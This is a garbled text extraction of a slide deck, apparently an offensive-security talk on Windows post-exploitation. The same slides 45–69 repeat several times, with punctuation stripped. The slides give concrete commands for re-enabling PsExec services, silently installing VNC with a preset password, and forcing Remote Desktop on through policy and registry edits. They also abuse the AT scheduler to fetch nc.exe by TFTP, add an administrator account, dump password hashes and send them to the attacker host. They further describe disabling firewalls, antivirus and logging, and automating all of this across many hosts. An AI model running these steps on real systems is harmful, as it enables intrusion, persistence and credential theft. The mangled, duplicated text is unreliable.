Abusing The Scheduler
bull Building a tool around AT ndash Flow
bull Establish authenticated sessionbull Determine the time on the targetbull Pass commands to the target to be run 1 min from now
ndash Write a batch file that executes everything at oncendash Have the target send you back whatever info you wantndash Be mindful of file transfer protocols TFTP is good but not
always ldquoquietrdquo or available
Slide 61
Abusing The Scheduler
bull Common use examplendash Net use targetndash Net time targetndash At target (net time +1min) ldquotftp ndashi use GET ebatrdquondash At target (net time +2min) ebatndash ebat does
bull Adds a user (net user hacked hacked add)ndash Admin group (net localgroup administrators hacked add)
bull Gets hashdumping tools and dumps hashesbull Sends hashes identified by IP back to attacker host
Slide 62
Abusing The Scheduler
bull Privileges of LocalSystem that we care aboutndash NT AUTHORITYSYSTEM and
BUILTINAdministrators SIDs ndash SE_IMPERSONATE_NAME ndash SE_TCB_NAME ndash SE_DEBUG_NAME
Slide 63
Massive Automation
Slide 64
Massive Automation
bull Automating techniques and tools for use against massive numbers of hosts
bull Goalsndash Penetrate as many systems as possible
with little interaction and in a short timendash Ease of use re-usendash Lower cost of attack
Slide 65
Massive Automation
bull MassNetUse ndash Establish netbios session credentials on range of hosts
bull MassWinenum ndash Enumerate Netbios information bypass certain RestrictAnonymous settings
bull AtAbuse ndash Use the scheduler as your ldquoshellrdquo to control ranges of hosts
Slide 66
bull DEMOS
Slide 67
bull Related talks you should seendash Beyond EIP ndash The theoretical tool
development end of things (spoonm amp skape)ndash Security Implications of Windows Access
Tokens (Luke Jennings)
Slide 68
bull Acknowledgementsndash Thanks to
bull All the people from offensivecomputing nologin uninformed IRC and SILC channels
bull HD Moore especially for support and mentorship bull Danny Quist krbklepto Egypt spoonm skape bull Luke Jennings for his awesome work
Slide 69
bull Questions bull Presentation available at
wwwoffensivecomputingnet
- Meta-Post Exploitation
- Slide 2
- Slide 3
- Slide 4
- Slide 5
- Slide 6
- Slide 7
- Slide 8
- Slide 9
- Slide 10
- Slide 11
- Slide 12
- Slide 13
- Slide 14
- Slide 15
- Slide 16
- Slide 17
- Slide 18
- Slide 19
- Slide 20
- Slide 21
- Slide 22
- Slide 23
- Slide 24
- Slide 25
- Slide 26
- Slide 27
- Slide 28
- Slide 29
- Slide 30
- Slide 31
- Slide 32
- Slide 33
- Slide 34
- Slide 35
- Slide 36
- Slide 37
- Slide 38
- Slide 39
- Slide 40
- Slide 41
- Slide 42
- Slide 43
- Slide 44
- Slide 45
- Slide 46
- Slide 47
- Slide 48
- Slide 49
- Slide 50
- Slide 51
- Slide 52
- Slide 53
- Slide 54
- Slide 55
- Slide 56
- Slide 57
- Slide 58
- Slide 59
- Slide 60
- Slide 61
- Slide 62
- Slide 63
- Slide 64
- Slide 65
- Slide 66
- Slide 67
- Slide 68
- Slide 69
-
Slide 45
Feature Modification
Slide 46
Feature Modification
bull Changing existing features or settings to benefit our activities
bull Goalsndash Support all Post-Exploitation activitiesndash Disabling detection technologiesndash Enabling in-secure or easy to use access
software
Slide 47
Feature Modification
bull Feature Modification is Basically Securable Object Manipulationndash Remember all those Tokens and Security Descriptorsndash These can be modified programmatically and directly
bull Not just through existing toolsndash Stealth Persistence requirements
bull May make it more advantageous to use custom toolsndash Access Objects programmaticallyndash Can be much more complex to implement
Slide 48
Feature Modification
bull Re-enabling disabled accessndash PsExec Itrsquos still cool (Thanks Mark)
bull Enabling GUI accessndash VNC (from a command line)ndash Remote Desktop (even if disabled)
bull Turning off or adding exceptions to security softwarendash Firewalls AV logging
bull Modifying Local Security Policies
Slide 49
Feature Modification
bull Enabling psexecndash Psexec was great awesome remote
shellcommand toolndash Everybody now disables clipbook which
psexec requires l4m3 ndash Lets re-enable it
Slide 50
Feature Modification
bull Enabling psexecbull Use the system control tool scexe
ndash Net use targetipc$ username userpasswordndash Sc target config netdde start= autondash Sc target config netddedsdm start= autondash Sc target config clipsrv start= autondash Sc target start netddendash Sc target start netddedsdmndash Sc target start clipserv
Slide 51
Feature Modification bull Enabling VNC (from command line)
ndash Go get VNC (check out guhnu)ndash Make a folder on the target for the vnc filesndash Copy the following files to target folder
bull Winvncexebull Vncregbull Vnchooksdllbull Omnithread_rtdll
ndash Regedit ndashs vncregndash Winvnc ndashinstallndash Net start ldquovnc serverrdquondash Winvncndash Password is ldquoinfectedrdquo
Vncreg file contents
[HKEY_LOCAL_MACHINESOFTWAREORLWinVNC3Default]SocketConnect=dword00000001AutoPortSelect=dword00000001InputsEnabled=dword00000001LocalInputsDisabled=dword00000000IdleTimeout=dword00000000QuerySetting=dword00000002QueryTimeout=dword0000000aPollUnderCursor=dword00000000PollForeground=dword00000001PollFullScreen=dword00000000OnlyPollConsole=dword00000001OnlyPollOnEvent=dword00000000Password=hex104d893d5ae155f8
Slide 52
Feature Modification
bull Enabling Remote Desktop remotelyndash Having a GUI to your target can be necessary ndash Maybe they are running a specialized GUI app
bull Ex System controlling access to security doorsndash No command line way of modifying system need GUI
bull SCADA systemsbull Security camerasbull Who knows what you might be up to
ndash Remote desktop is fast and already a feature of OSndash However itrsquos often disabled maybe even by GPO
Slide 53
Feature Modification bull Enabling Remote Desktop remotely
ndash Complicated procedure especially if GPOrsquos involved ndash Create a file named fix_ts_policyini
[Unicode]Unicode=yes[Version]signature=$CHICAGO$Revision=1[Privilege Rights]seremoteinteractivelogonright = hacked_accountseinteractivelogonright = hacked_accountsedenyinteractivelogonright =sedenyremoteinteractivelogonright =sedenynetworklogonright =
ndash This file will fix policy settings in your wayndash Change ldquohacked_accountrdquo to a real account
Slide 54
Feature Modification bull Enabling Remote Desktop remotely
ndash Create another file named enable_tsregWindows Registry Editor Version 500
[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal Server]
fDenyTSConnections=dword00000000TSEnabled=dword00000001TSUserEnabled=dword00000000
ndash Then perform these commandsbull sc config termservice start= autobull regedit s enable_tsregbull copy cwindowssecuritydatabaseseceditsdb cwindowssecuritydatabasenewseceditsdbbull copy cwindowssecuritydatabaseseceditsdb cwindowssecuritydatabaseorigseceditsdbbull secedit configure db newseceditsdb cfg fix_ts_policyinibull gpupdate Forcebull net start terminal services
Slide 55
bull DEMOS
Slide 56
Abusing The Scheduler
Slide 57
Abusing The Scheduler
bull Oldschool techniques can get results on new problems
bull Remember this is POST exploitation so you already have some access
bull AT command schedules things to run on at a specified time and date
ndash Schedule service must be running
Slide 58
Abusing The Scheduler
bull Often these days certain features are disabled for security
ndash Clipbook shares enumerationbull Use AT to get around these problems
ndash Usually NOT disabled
Net use targetipc$ password userusernameAt target 1200 pm commandEx At 19216811 1200pm tftp ndashI myip GET ncexe
Slide 59
Abusing The Scheduler
bull Often AT is still enabled while many other things you typically use are not
bull AT is as good as having a shellndash Enable Start Servicesndash Transfer filesndash Adding usersndash Messing with the registry policiesndash Pretty much anything you can do with a shellndash Added bonus defaults to run as SYSTEM
Slide 60
Abusing The Scheduler
bull Building a tool around AT ndash Flow
bull Establish authenticated sessionbull Determine the time on the targetbull Pass commands to the target to be run 1 min from now
ndash Write a batch file that executes everything at oncendash Have the target send you back whatever info you wantndash Be mindful of file transfer protocols TFTP is good but not
always ldquoquietrdquo or available
Slide 61
Abusing The Scheduler
bull Common use examplendash Net use targetndash Net time targetndash At target (net time +1min) ldquotftp ndashi use GET ebatrdquondash At target (net time +2min) ebatndash ebat does
bull Adds a user (net user hacked hacked add)ndash Admin group (net localgroup administrators hacked add)
bull Gets hashdumping tools and dumps hashesbull Sends hashes identified by IP back to attacker host
Slide 62
Abusing The Scheduler
bull Privileges of LocalSystem that we care aboutndash NT AUTHORITYSYSTEM and
BUILTINAdministrators SIDs ndash SE_IMPERSONATE_NAME ndash SE_TCB_NAME ndash SE_DEBUG_NAME
Slide 63
Massive Automation
Slide 64
Massive Automation
bull Automating techniques and tools for use against massive numbers of hosts
bull Goalsndash Penetrate as many systems as possible
with little interaction and in a short timendash Ease of use re-usendash Lower cost of attack
Slide 65
Massive Automation
bull MassNetUse ndash Establish netbios session credentials on range of hosts
bull MassWinenum ndash Enumerate Netbios information bypass certain RestrictAnonymous settings
bull AtAbuse ndash Use the scheduler as your ldquoshellrdquo to control ranges of hosts
Slide 66
bull DEMOS
Slide 67
bull Related talks you should seendash Beyond EIP ndash The theoretical tool
development end of things (spoonm amp skape)ndash Security Implications of Windows Access
Tokens (Luke Jennings)
Slide 68
bull Acknowledgementsndash Thanks to
bull All the people from offensivecomputing nologin uninformed IRC and SILC channels
bull HD Moore especially for support and mentorship bull Danny Quist krbklepto Egypt spoonm skape bull Luke Jennings for his awesome work
Slide 69
bull Questions bull Presentation available at
wwwoffensivecomputingnet
- Meta-Post Exploitation
- Slide 2
- Slide 3
- Slide 4
- Slide 5
- Slide 6
- Slide 7
- Slide 8
- Slide 9
- Slide 10
- Slide 11
- Slide 12
- Slide 13
- Slide 14
- Slide 15
- Slide 16
- Slide 17
- Slide 18
- Slide 19
- Slide 20
- Slide 21
- Slide 22
- Slide 23
- Slide 24
- Slide 25
- Slide 26
- Slide 27
- Slide 28
- Slide 29
- Slide 30
- Slide 31
- Slide 32
- Slide 33
- Slide 34
- Slide 35
- Slide 36
- Slide 37
- Slide 38
- Slide 39
- Slide 40
- Slide 41
- Slide 42
- Slide 43
- Slide 44
- Slide 45
- Slide 46
- Slide 47
- Slide 48
- Slide 49
- Slide 50
- Slide 51
- Slide 52
- Slide 53
- Slide 54
- Slide 55
- Slide 56
- Slide 57
- Slide 58
- Slide 59
- Slide 60
- Slide 61
- Slide 62
- Slide 63
- Slide 64
- Slide 65
- Slide 66
- Slide 67
- Slide 68
- Slide 69
-
Slide 46
Feature Modification
bull Changing existing features or settings to benefit our activities
bull Goalsndash Support all Post-Exploitation activitiesndash Disabling detection technologiesndash Enabling in-secure or easy to use access
software
Slide 47
Feature Modification
bull Feature Modification is Basically Securable Object Manipulationndash Remember all those Tokens and Security Descriptorsndash These can be modified programmatically and directly
bull Not just through existing toolsndash Stealth Persistence requirements
bull May make it more advantageous to use custom toolsndash Access Objects programmaticallyndash Can be much more complex to implement
Slide 48
Feature Modification
bull Re-enabling disabled accessndash PsExec Itrsquos still cool (Thanks Mark)
bull Enabling GUI accessndash VNC (from a command line)ndash Remote Desktop (even if disabled)
bull Turning off or adding exceptions to security softwarendash Firewalls AV logging
bull Modifying Local Security Policies
Slide 49
Feature Modification
bull Enabling psexecndash Psexec was great awesome remote
shellcommand toolndash Everybody now disables clipbook which
psexec requires l4m3 ndash Lets re-enable it
Slide 50
Feature Modification
bull Enabling psexecbull Use the system control tool scexe
ndash Net use targetipc$ username userpasswordndash Sc target config netdde start= autondash Sc target config netddedsdm start= autondash Sc target config clipsrv start= autondash Sc target start netddendash Sc target start netddedsdmndash Sc target start clipserv
Slide 51
Feature Modification bull Enabling VNC (from command line)
ndash Go get VNC (check out guhnu)ndash Make a folder on the target for the vnc filesndash Copy the following files to target folder
bull Winvncexebull Vncregbull Vnchooksdllbull Omnithread_rtdll
ndash Regedit ndashs vncregndash Winvnc ndashinstallndash Net start ldquovnc serverrdquondash Winvncndash Password is ldquoinfectedrdquo
Vncreg file contents
[HKEY_LOCAL_MACHINESOFTWAREORLWinVNC3Default]SocketConnect=dword00000001AutoPortSelect=dword00000001InputsEnabled=dword00000001LocalInputsDisabled=dword00000000IdleTimeout=dword00000000QuerySetting=dword00000002QueryTimeout=dword0000000aPollUnderCursor=dword00000000PollForeground=dword00000001PollFullScreen=dword00000000OnlyPollConsole=dword00000001OnlyPollOnEvent=dword00000000Password=hex104d893d5ae155f8
Slide 52
Feature Modification
bull Enabling Remote Desktop remotelyndash Having a GUI to your target can be necessary ndash Maybe they are running a specialized GUI app
bull Ex System controlling access to security doorsndash No command line way of modifying system need GUI
bull SCADA systemsbull Security camerasbull Who knows what you might be up to
ndash Remote desktop is fast and already a feature of OSndash However itrsquos often disabled maybe even by GPO
Slide 53
Feature Modification bull Enabling Remote Desktop remotely
ndash Complicated procedure especially if GPOrsquos involved ndash Create a file named fix_ts_policyini
[Unicode]Unicode=yes[Version]signature=$CHICAGO$Revision=1[Privilege Rights]seremoteinteractivelogonright = hacked_accountseinteractivelogonright = hacked_accountsedenyinteractivelogonright =sedenyremoteinteractivelogonright =sedenynetworklogonright =
ndash This file will fix policy settings in your wayndash Change ldquohacked_accountrdquo to a real account
Slide 54
Feature Modification bull Enabling Remote Desktop remotely
ndash Create another file named enable_tsregWindows Registry Editor Version 500
[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal Server]
fDenyTSConnections=dword00000000TSEnabled=dword00000001TSUserEnabled=dword00000000
ndash Then perform these commandsbull sc config termservice start= autobull regedit s enable_tsregbull copy cwindowssecuritydatabaseseceditsdb cwindowssecuritydatabasenewseceditsdbbull copy cwindowssecuritydatabaseseceditsdb cwindowssecuritydatabaseorigseceditsdbbull secedit configure db newseceditsdb cfg fix_ts_policyinibull gpupdate Forcebull net start terminal services
Slide 55
bull DEMOS
Slide 56
Abusing The Scheduler
Slide 57
Abusing The Scheduler
bull Oldschool techniques can get results on new problems
bull Remember this is POST exploitation so you already have some access
bull AT command schedules things to run on at a specified time and date
ndash Schedule service must be running
Slide 58
Abusing The Scheduler
bull Often these days certain features are disabled for security
ndash Clipbook shares enumerationbull Use AT to get around these problems
ndash Usually NOT disabled
Net use targetipc$ password userusernameAt target 1200 pm commandEx At 19216811 1200pm tftp ndashI myip GET ncexe
Slide 59
Abusing The Scheduler
bull Often AT is still enabled while many other things you typically use are not
bull AT is as good as having a shellndash Enable Start Servicesndash Transfer filesndash Adding usersndash Messing with the registry policiesndash Pretty much anything you can do with a shellndash Added bonus defaults to run as SYSTEM
Slide 60
Abusing The Scheduler
bull Building a tool around AT ndash Flow
bull Establish authenticated sessionbull Determine the time on the targetbull Pass commands to the target to be run 1 min from now
ndash Write a batch file that executes everything at oncendash Have the target send you back whatever info you wantndash Be mindful of file transfer protocols TFTP is good but not
always ldquoquietrdquo or available
Slide 61
Abusing The Scheduler
bull Common use examplendash Net use targetndash Net time targetndash At target (net time +1min) ldquotftp ndashi use GET ebatrdquondash At target (net time +2min) ebatndash ebat does
bull Adds a user (net user hacked hacked add)ndash Admin group (net localgroup administrators hacked add)
bull Gets hashdumping tools and dumps hashesbull Sends hashes identified by IP back to attacker host
Slide 62
Abusing The Scheduler
bull Privileges of LocalSystem that we care aboutndash NT AUTHORITYSYSTEM and
BUILTINAdministrators SIDs ndash SE_IMPERSONATE_NAME ndash SE_TCB_NAME ndash SE_DEBUG_NAME
Slide 63
Massive Automation
Slide 64
Massive Automation
bull Automating techniques and tools for use against massive numbers of hosts
bull Goalsndash Penetrate as many systems as possible
with little interaction and in a short timendash Ease of use re-usendash Lower cost of attack
Slide 65
Massive Automation
bull MassNetUse ndash Establish netbios session credentials on range of hosts
bull MassWinenum ndash Enumerate Netbios information bypass certain RestrictAnonymous settings
bull AtAbuse ndash Use the scheduler as your ldquoshellrdquo to control ranges of hosts
Slide 66
bull DEMOS
Slide 67
bull Related talks you should seendash Beyond EIP ndash The theoretical tool
development end of things (spoonm amp skape)ndash Security Implications of Windows Access
Tokens (Luke Jennings)
Slide 68
bull Acknowledgementsndash Thanks to
bull All the people from offensivecomputing nologin uninformed IRC and SILC channels
bull HD Moore especially for support and mentorship bull Danny Quist krbklepto Egypt spoonm skape bull Luke Jennings for his awesome work
Slide 69
bull Questions bull Presentation available at
wwwoffensivecomputingnet
- Meta-Post Exploitation
- Slide 2
- Slide 3
- Slide 4
- Slide 5
- Slide 6
- Slide 7
- Slide 8
- Slide 9
- Slide 10
- Slide 11
- Slide 12
- Slide 13
- Slide 14
- Slide 15
- Slide 16
- Slide 17
- Slide 18
- Slide 19
- Slide 20
- Slide 21
- Slide 22
- Slide 23
- Slide 24
- Slide 25
- Slide 26
- Slide 27
- Slide 28
- Slide 29
- Slide 30
- Slide 31
- Slide 32
- Slide 33
- Slide 34
- Slide 35
- Slide 36
- Slide 37
- Slide 38
- Slide 39
- Slide 40
- Slide 41
- Slide 42
- Slide 43
- Slide 44
- Slide 45
- Slide 46
- Slide 47
- Slide 48
- Slide 49
- Slide 50
- Slide 51
- Slide 52
- Slide 53
- Slide 54
- Slide 55
- Slide 56
- Slide 57
- Slide 58
- Slide 59
- Slide 60
- Slide 61
- Slide 62
- Slide 63
- Slide 64
- Slide 65
- Slide 66
- Slide 67
- Slide 68
- Slide 69
-
Slide 47
Feature Modification
bull Feature Modification is Basically Securable Object Manipulationndash Remember all those Tokens and Security Descriptorsndash These can be modified programmatically and directly
bull Not just through existing toolsndash Stealth Persistence requirements
bull May make it more advantageous to use custom toolsndash Access Objects programmaticallyndash Can be much more complex to implement
Slide 48
Feature Modification
bull Re-enabling disabled accessndash PsExec Itrsquos still cool (Thanks Mark)
bull Enabling GUI accessndash VNC (from a command line)ndash Remote Desktop (even if disabled)
bull Turning off or adding exceptions to security softwarendash Firewalls AV logging
bull Modifying Local Security Policies
Slide 49
Feature Modification
bull Enabling psexecndash Psexec was great awesome remote
shellcommand toolndash Everybody now disables clipbook which
psexec requires l4m3 ndash Lets re-enable it
Slide 50
Feature Modification
bull Enabling psexecbull Use the system control tool scexe
ndash Net use targetipc$ username userpasswordndash Sc target config netdde start= autondash Sc target config netddedsdm start= autondash Sc target config clipsrv start= autondash Sc target start netddendash Sc target start netddedsdmndash Sc target start clipserv
Slide 51
Feature Modification bull Enabling VNC (from command line)
ndash Go get VNC (check out guhnu)ndash Make a folder on the target for the vnc filesndash Copy the following files to target folder
bull Winvncexebull Vncregbull Vnchooksdllbull Omnithread_rtdll
ndash Regedit ndashs vncregndash Winvnc ndashinstallndash Net start ldquovnc serverrdquondash Winvncndash Password is ldquoinfectedrdquo
Vncreg file contents
[HKEY_LOCAL_MACHINESOFTWAREORLWinVNC3Default]SocketConnect=dword00000001AutoPortSelect=dword00000001InputsEnabled=dword00000001LocalInputsDisabled=dword00000000IdleTimeout=dword00000000QuerySetting=dword00000002QueryTimeout=dword0000000aPollUnderCursor=dword00000000PollForeground=dword00000001PollFullScreen=dword00000000OnlyPollConsole=dword00000001OnlyPollOnEvent=dword00000000Password=hex104d893d5ae155f8
Slide 52
Feature Modification
bull Enabling Remote Desktop remotelyndash Having a GUI to your target can be necessary ndash Maybe they are running a specialized GUI app
bull Ex System controlling access to security doorsndash No command line way of modifying system need GUI
bull SCADA systemsbull Security camerasbull Who knows what you might be up to
ndash Remote desktop is fast and already a feature of OSndash However itrsquos often disabled maybe even by GPO
Slide 53
Feature Modification bull Enabling Remote Desktop remotely
ndash Complicated procedure especially if GPOrsquos involved ndash Create a file named fix_ts_policyini
[Unicode]Unicode=yes[Version]signature=$CHICAGO$Revision=1[Privilege Rights]seremoteinteractivelogonright = hacked_accountseinteractivelogonright = hacked_accountsedenyinteractivelogonright =sedenyremoteinteractivelogonright =sedenynetworklogonright =
ndash This file will fix policy settings in your wayndash Change ldquohacked_accountrdquo to a real account
Slide 54
Feature Modification bull Enabling Remote Desktop remotely
ndash Create another file named enable_tsregWindows Registry Editor Version 500
[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal Server]
fDenyTSConnections=dword00000000TSEnabled=dword00000001TSUserEnabled=dword00000000
ndash Then perform these commandsbull sc config termservice start= autobull regedit s enable_tsregbull copy cwindowssecuritydatabaseseceditsdb cwindowssecuritydatabasenewseceditsdbbull copy cwindowssecuritydatabaseseceditsdb cwindowssecuritydatabaseorigseceditsdbbull secedit configure db newseceditsdb cfg fix_ts_policyinibull gpupdate Forcebull net start terminal services
Slide 55
bull DEMOS
Slide 56
Abusing The Scheduler
Slide 57
Abusing The Scheduler
bull Oldschool techniques can get results on new problems
bull Remember this is POST exploitation so you already have some access
bull AT command schedules things to run on at a specified time and date
ndash Schedule service must be running
Slide 58
Abusing The Scheduler
bull Often these days certain features are disabled for security
ndash Clipbook shares enumerationbull Use AT to get around these problems
ndash Usually NOT disabled
Net use targetipc$ password userusernameAt target 1200 pm commandEx At 19216811 1200pm tftp ndashI myip GET ncexe
Slide 59
Abusing The Scheduler
bull Often AT is still enabled while many other things you typically use are not
bull AT is as good as having a shellndash Enable Start Servicesndash Transfer filesndash Adding usersndash Messing with the registry policiesndash Pretty much anything you can do with a shellndash Added bonus defaults to run as SYSTEM
Slide 60
Abusing The Scheduler
bull Building a tool around AT ndash Flow
bull Establish authenticated sessionbull Determine the time on the targetbull Pass commands to the target to be run 1 min from now
ndash Write a batch file that executes everything at oncendash Have the target send you back whatever info you wantndash Be mindful of file transfer protocols TFTP is good but not
always ldquoquietrdquo or available
Slide 61
Abusing The Scheduler
bull Common use examplendash Net use targetndash Net time targetndash At target (net time +1min) ldquotftp ndashi use GET ebatrdquondash At target (net time +2min) ebatndash ebat does
bull Adds a user (net user hacked hacked add)ndash Admin group (net localgroup administrators hacked add)
bull Gets hashdumping tools and dumps hashesbull Sends hashes identified by IP back to attacker host
Slide 62
Abusing The Scheduler
bull Privileges of LocalSystem that we care aboutndash NT AUTHORITYSYSTEM and
BUILTINAdministrators SIDs ndash SE_IMPERSONATE_NAME ndash SE_TCB_NAME ndash SE_DEBUG_NAME
Slide 63
Massive Automation
Slide 64
Massive Automation
bull Automating techniques and tools for use against massive numbers of hosts
bull Goalsndash Penetrate as many systems as possible
with little interaction and in a short timendash Ease of use re-usendash Lower cost of attack
Slide 65
Massive Automation
bull MassNetUse ndash Establish netbios session credentials on range of hosts
bull MassWinenum ndash Enumerate Netbios information bypass certain RestrictAnonymous settings
bull AtAbuse ndash Use the scheduler as your ldquoshellrdquo to control ranges of hosts
Slide 66
bull DEMOS
Slide 67
bull Related talks you should seendash Beyond EIP ndash The theoretical tool
development end of things (spoonm amp skape)ndash Security Implications of Windows Access
Tokens (Luke Jennings)
Slide 68
bull Acknowledgementsndash Thanks to
bull All the people from offensivecomputing nologin uninformed IRC and SILC channels
bull HD Moore especially for support and mentorship bull Danny Quist krbklepto Egypt spoonm skape bull Luke Jennings for his awesome work
Slide 69
bull Questions bull Presentation available at
wwwoffensivecomputingnet
- Meta-Post Exploitation
- Slide 2
- Slide 3
- Slide 4
- Slide 5
- Slide 6
- Slide 7
- Slide 8
- Slide 9
- Slide 10
- Slide 11
- Slide 12
- Slide 13
- Slide 14
- Slide 15
- Slide 16
- Slide 17
- Slide 18
- Slide 19
- Slide 20
- Slide 21
- Slide 22
- Slide 23
- Slide 24
- Slide 25
- Slide 26
- Slide 27
- Slide 28
- Slide 29
- Slide 30
- Slide 31
- Slide 32
- Slide 33
- Slide 34
- Slide 35
- Slide 36
- Slide 37
- Slide 38
- Slide 39
- Slide 40
- Slide 41
- Slide 42
- Slide 43
- Slide 44
- Slide 45
- Slide 46
- Slide 47
- Slide 48
- Slide 49
- Slide 50
- Slide 51
- Slide 52
- Slide 53
- Slide 54
- Slide 55
- Slide 56
- Slide 57
- Slide 58
- Slide 59
- Slide 60
- Slide 61
- Slide 62
- Slide 63
- Slide 64
- Slide 65
- Slide 66
- Slide 67
- Slide 68
- Slide 69
-
Slide 48
Feature Modification
bull Re-enabling disabled accessndash PsExec Itrsquos still cool (Thanks Mark)
bull Enabling GUI accessndash VNC (from a command line)ndash Remote Desktop (even if disabled)
bull Turning off or adding exceptions to security softwarendash Firewalls AV logging
bull Modifying Local Security Policies
Slide 49
Feature Modification
bull Enabling psexecndash Psexec was great awesome remote
shellcommand toolndash Everybody now disables clipbook which
psexec requires l4m3 ndash Lets re-enable it
Slide 50
Feature Modification
bull Enabling psexecbull Use the system control tool scexe
ndash Net use targetipc$ username userpasswordndash Sc target config netdde start= autondash Sc target config netddedsdm start= autondash Sc target config clipsrv start= autondash Sc target start netddendash Sc target start netddedsdmndash Sc target start clipserv
Slide 51
Feature Modification bull Enabling VNC (from command line)
ndash Go get VNC (check out guhnu)ndash Make a folder on the target for the vnc filesndash Copy the following files to target folder
bull Winvncexebull Vncregbull Vnchooksdllbull Omnithread_rtdll
ndash Regedit ndashs vncregndash Winvnc ndashinstallndash Net start ldquovnc serverrdquondash Winvncndash Password is ldquoinfectedrdquo
Vncreg file contents
[HKEY_LOCAL_MACHINESOFTWAREORLWinVNC3Default]SocketConnect=dword00000001AutoPortSelect=dword00000001InputsEnabled=dword00000001LocalInputsDisabled=dword00000000IdleTimeout=dword00000000QuerySetting=dword00000002QueryTimeout=dword0000000aPollUnderCursor=dword00000000PollForeground=dword00000001PollFullScreen=dword00000000OnlyPollConsole=dword00000001OnlyPollOnEvent=dword00000000Password=hex104d893d5ae155f8
Slide 52
Feature Modification
bull Enabling Remote Desktop remotelyndash Having a GUI to your target can be necessary ndash Maybe they are running a specialized GUI app
bull Ex System controlling access to security doorsndash No command line way of modifying system need GUI
bull SCADA systemsbull Security camerasbull Who knows what you might be up to
ndash Remote desktop is fast and already a feature of OSndash However itrsquos often disabled maybe even by GPO
Slide 53
Feature Modification bull Enabling Remote Desktop remotely
ndash Complicated procedure especially if GPOrsquos involved ndash Create a file named fix_ts_policyini
[Unicode]Unicode=yes[Version]signature=$CHICAGO$Revision=1[Privilege Rights]seremoteinteractivelogonright = hacked_accountseinteractivelogonright = hacked_accountsedenyinteractivelogonright =sedenyremoteinteractivelogonright =sedenynetworklogonright =
ndash This file will fix policy settings in your wayndash Change ldquohacked_accountrdquo to a real account
Slide 54
Feature Modification bull Enabling Remote Desktop remotely
ndash Create another file named enable_tsregWindows Registry Editor Version 500
[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal Server]
fDenyTSConnections=dword00000000TSEnabled=dword00000001TSUserEnabled=dword00000000
ndash Then perform these commandsbull sc config termservice start= autobull regedit s enable_tsregbull copy cwindowssecuritydatabaseseceditsdb cwindowssecuritydatabasenewseceditsdbbull copy cwindowssecuritydatabaseseceditsdb cwindowssecuritydatabaseorigseceditsdbbull secedit configure db newseceditsdb cfg fix_ts_policyinibull gpupdate Forcebull net start terminal services
Slide 55
bull DEMOS
Slide 56
Abusing The Scheduler
Slide 57
Abusing The Scheduler
bull Oldschool techniques can get results on new problems
bull Remember this is POST exploitation so you already have some access
bull AT command schedules things to run on at a specified time and date
ndash Schedule service must be running
Slide 58
Abusing The Scheduler
bull Often these days certain features are disabled for security
ndash Clipbook shares enumerationbull Use AT to get around these problems
ndash Usually NOT disabled
Net use targetipc$ password userusernameAt target 1200 pm commandEx At 19216811 1200pm tftp ndashI myip GET ncexe
Slide 59
Abusing The Scheduler
bull Often AT is still enabled while many other things you typically use are not
bull AT is as good as having a shellndash Enable Start Servicesndash Transfer filesndash Adding usersndash Messing with the registry policiesndash Pretty much anything you can do with a shellndash Added bonus defaults to run as SYSTEM
Slide 60
Abusing The Scheduler
bull Building a tool around AT ndash Flow
bull Establish authenticated sessionbull Determine the time on the targetbull Pass commands to the target to be run 1 min from now
ndash Write a batch file that executes everything at oncendash Have the target send you back whatever info you wantndash Be mindful of file transfer protocols TFTP is good but not
always ldquoquietrdquo or available
Slide 61
Abusing The Scheduler
bull Common use examplendash Net use targetndash Net time targetndash At target (net time +1min) ldquotftp ndashi use GET ebatrdquondash At target (net time +2min) ebatndash ebat does
bull Adds a user (net user hacked hacked add)ndash Admin group (net localgroup administrators hacked add)
bull Gets hashdumping tools and dumps hashesbull Sends hashes identified by IP back to attacker host
Slide 62
Abusing The Scheduler
bull Privileges of LocalSystem that we care aboutndash NT AUTHORITYSYSTEM and
BUILTINAdministrators SIDs ndash SE_IMPERSONATE_NAME ndash SE_TCB_NAME ndash SE_DEBUG_NAME
Slide 63
Massive Automation
Slide 64
Massive Automation
bull Automating techniques and tools for use against massive numbers of hosts
bull Goalsndash Penetrate as many systems as possible
with little interaction and in a short timendash Ease of use re-usendash Lower cost of attack
Slide 65
Massive Automation
bull MassNetUse ndash Establish netbios session credentials on range of hosts
bull MassWinenum ndash Enumerate Netbios information bypass certain RestrictAnonymous settings
bull AtAbuse ndash Use the scheduler as your ldquoshellrdquo to control ranges of hosts
Slide 66
bull DEMOS
Slide 67
bull Related talks you should seendash Beyond EIP ndash The theoretical tool
development end of things (spoonm amp skape)ndash Security Implications of Windows Access
Tokens (Luke Jennings)
Slide 68
bull Acknowledgementsndash Thanks to
bull All the people from offensivecomputing nologin uninformed IRC and SILC channels
bull HD Moore especially for support and mentorship bull Danny Quist krbklepto Egypt spoonm skape bull Luke Jennings for his awesome work
Slide 69
bull Questions bull Presentation available at
wwwoffensivecomputingnet
- Meta-Post Exploitation
- Slide 2
- Slide 3
- Slide 4
- Slide 5
- Slide 6
- Slide 7
- Slide 8
- Slide 9
- Slide 10
- Slide 11
- Slide 12
- Slide 13
- Slide 14
- Slide 15
- Slide 16
- Slide 17
- Slide 18
- Slide 19
- Slide 20
- Slide 21
- Slide 22
- Slide 23
- Slide 24
- Slide 25
- Slide 26
- Slide 27
- Slide 28
- Slide 29
- Slide 30
- Slide 31
- Slide 32
- Slide 33
- Slide 34
- Slide 35
- Slide 36
- Slide 37
- Slide 38
- Slide 39
- Slide 40
- Slide 41
- Slide 42
- Slide 43
- Slide 44
- Slide 45
- Slide 46
- Slide 47
- Slide 48
- Slide 49
- Slide 50
- Slide 51
- Slide 52
- Slide 53
- Slide 54
- Slide 55
- Slide 56
- Slide 57
- Slide 58
- Slide 59
- Slide 60
- Slide 61
- Slide 62
- Slide 63
- Slide 64
- Slide 65
- Slide 66
- Slide 67
- Slide 68
- Slide 69
-
Slide 49
Feature Modification
bull Enabling psexecndash Psexec was great awesome remote
shellcommand toolndash Everybody now disables clipbook which
psexec requires l4m3 ndash Lets re-enable it
Slide 50
Feature Modification
bull Enabling psexecbull Use the system control tool scexe
ndash Net use targetipc$ username userpasswordndash Sc target config netdde start= autondash Sc target config netddedsdm start= autondash Sc target config clipsrv start= autondash Sc target start netddendash Sc target start netddedsdmndash Sc target start clipserv
Slide 51
Feature Modification bull Enabling VNC (from command line)
